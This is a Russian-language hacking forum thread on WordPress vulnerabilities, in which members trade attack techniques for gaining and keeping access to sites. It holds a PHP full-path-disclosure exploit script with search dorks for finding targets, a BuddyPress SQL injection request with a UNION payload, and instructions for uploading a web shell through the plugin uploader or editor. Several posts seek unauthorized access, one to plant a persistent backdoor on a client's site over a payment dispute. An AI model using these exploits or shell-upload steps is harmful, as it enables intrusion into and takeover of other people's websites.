[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. morgan-id

    morgan-id New Member

    Joined:
    17 Feb 2010
    Messages:
    55
    Likes Received:
    0
    Reputations:
    0
    подскажите , хостинг стоит на CPanel движок WordPress доступ есть полный и на хостинг админом и в админ панель WordPress
    что можно сделать или какой шелл залить что бы я всегда имел доступ и знал пароль в случае его смены ?
    проблема не оплаты за работу создания сайта , доступ пока у меня есть ко всему абсолютно но думаю скоро сменят пароли
    за советы буду благодарен !
     
  2. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    140
    Likes Received:
    13
    Reputations:
    0
    Пагни, такое дело

    Есть wordpress 3.3.1
    Права на заливку - онли wp-upload
    Залить пхп файл то я залил, но в этой дире он не выполнется.
    Пытался залить туда .htaccess - безрезультатно.
    Если нет прав на темплат, есть ещё способы?

    upd: из плагинов стоят дискус и адсэнс, но в них походу ничего нет :(
     
    #202 Mr.Snuffer, 2 Apr 2012
    Last edited: 2 Apr 2012
  3. pr3v3d

    pr3v3d New Member

    Joined:
    27 Jul 2010
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Раскрытие путей в thumb.php
    в модуле flashservices

    дорка:flashservices/services/thumb.php
     
  4. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Раскрытие путей в WordPress >= 3.31
    На данный момент, самая новая версия :)
    Данная уязвимость присутствует во многих файлах из директории wp-includes, например, файл /wp-includes/admin-bar.php

    Exploit (Exploit OsWpFp v.0.5):

    PHP:
    <form method=GET>
    <input type=text name=url>
    <input type=submit value="Check URL">
    </form>
    <?php
    $url 
    $_GET['url']; //URL Site
    $site=$url.'/wp-includes/admin-bar.php';
    $e = @file_get_contents($site);
    if(
    $e and $e !== "")
     {
    $a = array("<br />\n<b>Fatal error</b>:  Call to undefined function add_action() in "," on line <b>39</b><br />","/wp-includes/admin-bar.php","<br />\n<b>Fatal error</b>:  Call to undefined function  add_action() in ","Fatal error: Call to undefined function add_action() in "," on line 39");
    for(
    $i=0$i count($a); ++$i)
     {
     
    $e explode($a[$i],$e);
     
    $e implode("",$e);
     }
    echo 
    "<hr size=1><span style=\"font-family: Calibri;\">Full path site <b>".$url."</b>:<br>".$e."<hr size=1>/*Exploit By Osstudio*/<br>\nICQ: 375647532</span>";
    /*Exploit By Osstudio*/
    }
    else
     {
     echo 
    "Ожидание ввода, либо не удалось использовать!";
     }
    ?>
    Веб версия эксплоита
    Dork:
    allinurl:.ru/wp-includes/admin-bar.php
    allinurl:.com/wp-includes/admin-bar.php
    (c) Osstudio
     
    #204 Osstudio, 10 Apr 2012
    Last edited: 10 Apr 2012
  5. fiin

    fiin New Member

    Joined:
    25 Jan 2012
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Расскажи новичку по подробнее как воспользоваться, если не трудно
     
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    PHP интерпретатор нужен. Самое легкое, скачай Denwer и запускай.
     
  7. fiin

    fiin New Member

    Joined:
    25 Jan 2012
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    благодарю
     
  8. fiin

    fiin New Member

    Joined:
    25 Jan 2012
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    [​IMG]
    Подскажите, что я должен делать дальше? Что это мне даст
     
  9. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    Это тебе дает раскрытие путей, что позволяет узнать путь сервера , которые нужен в различных вариантов развития событий, но в твоем случае думаю ничего не дает
     
    _________________________
  10. demko

    demko New Member

    Joined:
    19 Nov 2009
    Messages:
    13
    Likes Received:
    2
    Reputations:
    1
    пароль если сменят, ты получишь тока хэш его, он хранится в бд не в открытом виде.
    создай юзверя к БД с правами ещё одного... по поводу шелла хз, другие мб тебе подскажут, я таким не занимаюсь :)
     
  11. fiin

    fiin New Member

    Joined:
    25 Jan 2012
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Народ, есть что-нибудь на 2.9.2 версию?
    Через _tp://localhost/wordpress/wp-admin/admin.php?page=ExcludePosts смогу к sql подобраться? Расскажите как сайт на 2.9.2 вскрыть, пожалуйста.
     
  12. .while

    .while Member

    Joined:
    22 Feb 2010
    Messages:
    40
    Likes Received:
    5
    Reputations:
    0
    имя юзера или что?
    пройдут запросы с livehttpheader?
     
  13. Bossss

    Bossss New Member

    Joined:
    23 Apr 2012
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Code:
    # Exploit Title: Buddypress plugin of Wordpress remote SQL Injection
    # Date: March 31, 2012
    # Author: Ivan Terkin
    # Exploitation: Remote Exploit
    # Bug: Remote SQL Injection
    # Software Link: buddypress.org
    # Version: till 1.5.5
    # Tested on: Buddypress 1.5.4
     
     
    POST /wp-load.php HTTP/1.1
    User-Agent: Mozilla
    Host: example.com
    Accept: */*
    Referer: http://example.com/activity/?s=b
    Connection: Keep-Alive
    Content-Length: 153
    Content-Type: application/x-www-form-urlencoded
     
    action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
     
    Reported to developers and fixed in version 1.5.5
     
  14. sqonf

    sqonf New Member

    Joined:
    1 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Есть wordpress-сайт с уязвимым timthumb.php. Эксплоит отрабатывает, в директории "cache" создается файлик external_[хэш].php. Теперь не понятно, как народ закрепляется, фрэймит итд? если у скрипта external_[хэш].php прав на запись в директории и файло нехватет?
    Спасибо
     
    #214 sqonf, 26 Apr 2012
    Last edited: 26 Apr 2012
  15. Radiator

    Radiator Active Member

    Joined:
    17 Mar 2009
    Messages:
    394
    Likes Received:
    143
    Reputations:
    24
    столкнулся с невозможностью правки php файлов themes.

    идем в Plugin
    update.php?action=upload-plugin , там нет ограничений на расширения. туда заливаем наш шелл. идем в Media и видим его там.
     
  16. sqonf

    sqonf New Member

    Joined:
    1 Apr 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0

    К сожалению у меня для этого нет админки. Шелл я и так могу залить, не проблема. Проблема в том, что для закрепления нет прав для записи в каталогах и файлах.
     
  17. Otar3s

    Otar3s New Member

    Joined:
    12 Apr 2012
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    Ребят,help:)
    есть админка вордпресса.там нету прав на шаблоны и плагины.
    пробовал залить php в плагины add new(plugins) но Forbidden!:(

    You are using WordPress 3.2.1

    (дубль с експа)
     
    #217 Otar3s, 30 Apr 2012
    Last edited: 30 Apr 2012
  18. Otar3s

    Otar3s New Member

    Joined:
    12 Apr 2012
    Messages:
    0
    Likes Received:
    2
    Reputations:
    0
    пробовал
    update.php?action=upload-plugin
    нету такого адреса вроде как понял.
    ничего из из этого не помогает.help, проконсультируйте.
     
  19. Coder +++

    Coder +++ Elder - Старейшина

    Joined:
    24 May 2011
    Messages:
    111
    Likes Received:
    25
    Reputations:
    13
    Как залить шел, имея доступ к админке.
    ВП 3.3.2
     
  20. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Editor.